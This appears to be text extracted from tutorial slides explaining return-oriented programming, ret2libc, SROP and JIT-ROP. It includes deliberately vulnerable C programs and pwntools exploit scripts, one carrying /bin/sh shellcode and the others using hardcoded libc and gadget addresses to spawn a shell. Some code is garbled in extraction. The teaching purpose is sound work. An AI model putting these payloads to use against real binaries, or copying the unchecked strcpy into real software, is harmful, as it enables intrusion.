rop and it's friends

ROPand it’s friends BY Rakesh Paruchuri

CONTENTS

> WHAT IS ROP> THE NEED FOR ROP > ROP vs RET2LIBC> FRIENDS

what is rop?

→ return oriented programming→ take advantage of buffer overflow→ gain control over instruction pointer→ chain them with gadgets

NEED FOR ROPTO EXPLOIT CODE WE NEED

CODE EXECUTIONOVERFLOW BUFFER ON THE STACK GET CONTROL OVER EIPOVERWRITE SAVED RETURN ADDRESS

LET’S GIVE A TRY

#include<stdio.h>int main(int argc,char **argv) {

char buffer[50];strcpy(buffer,argv[1]);return 0;

}

Exploit:from pwn import *payload = ''payload += '\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh'payload += 'A'*16payload += p32(0xffffd676)

print payload

Return To Libc

NX: Protection mechanism aimed to NOT EXECUTE STACK But can corrupt stack and control EIP

why not point eip to something which can create shell

Return To Libc

→ assuming libc is static (ALSR OFF)→ padding “blah blah” into buffer to reach eip → overwriting &system into saved eip→ supplying “/bin/sh” as argument

LET’S GIVE A TRY

#include<stdlib.h>int main(int argc,char **argv) {

char buffer[50]; strcpy(buffer,argv[1]); return 0;}

→

EXPOIT

from pwn import *payload = ''payload += 'A'*54payload += p32(0xf7e48190) # &systempayload += 'BBBB' payload += p32(0xf7f68a24) # &’/bin/sh’

print payload

ROP

ASLR Protection mechanism aimed to randomize the addresses of Shared libraries and virtual memory

What is rop??

→ return oriented programming → re-use pieces of code from code segment→ assemble all pieces into desired shell code

GADGETS

gadget is any instruction sequence ending with RET instruction

ret = pop eip

EXAMPLE FOR GADGET

→ store several values in registers→ you don’t lose control over EIP because of @RET instruction at the ending of the gadget

corresponding code for the gadget

payload += p64(0x401093)payload += p64(0xrbx)payload += p64(0xrbp)payload += p64(0xr12)payload += p64(next_gadget)

LET’S GIVE A TRY#include<stdio.h>

static int flag;

void vuln_function1(){ flag++;}

void vuln_function2(){ if(flag == 1) system("/bin/sh");}

int main(int argc,char **argv) { char buf[50]; strcpy(buf,argv[1]); return 0;}

EXPLOITfrom pwn import *

payload = ''payload += "A"*54payload += p32(0x0804844d) #address of vuln_function1payload += p32(0x08048536) # pop ebx ; ret payload += p32(0xdeedbeef)payload += p32(0x0804845f) #address of vunl_function2

print payload

ROP vs RET2LIBC

RET2LIBCROP

SROP

→ less number of gadgets→ building shell code by chaining system calls→ attackers set up fake signal frames and initiate and returns from signals that the kernel never delivered

exploiting rop registers

eip

esp

exploiting srop registers

eip

esp

exploiting srop registers

eip

esp

exploiting srop registers

eip

esp

JIT-ROP

→ Fine-grained address space layout randomization→ offset keeps varying → requires a information leak→ chaining of gadgets must be done at run time

→ executing shellcode in stack→ ret2libc→ rop→ srop & jit-rop